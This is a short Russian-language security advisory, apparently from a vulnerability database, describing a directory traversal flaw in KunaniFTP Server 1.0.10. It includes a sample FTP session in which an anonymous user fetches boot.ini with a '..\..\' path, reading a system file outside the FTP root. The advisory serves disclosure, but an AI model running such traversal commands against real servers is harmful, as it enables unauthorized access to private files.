Доступ к произвольным файлам в KunaniFTP Server

Дата публикации:
15.12.2002
Всего просмотров:
615
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: KunaniFTP-Server (www.kunani.com) – FTP сервер для windows систем. Некоторые FTP команды позволяют обойти основной каталог и получить доступ к файлам вне ftp root

. Пример:

######################################################
Verbindung mit server.
220 Kunani FTP Server Ready  ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek. #####################################################
Уязвимость обнаружена в KunaniFTP-Server v.1.0.10

Ссылки: Источник
или введите имя

CAPTCHA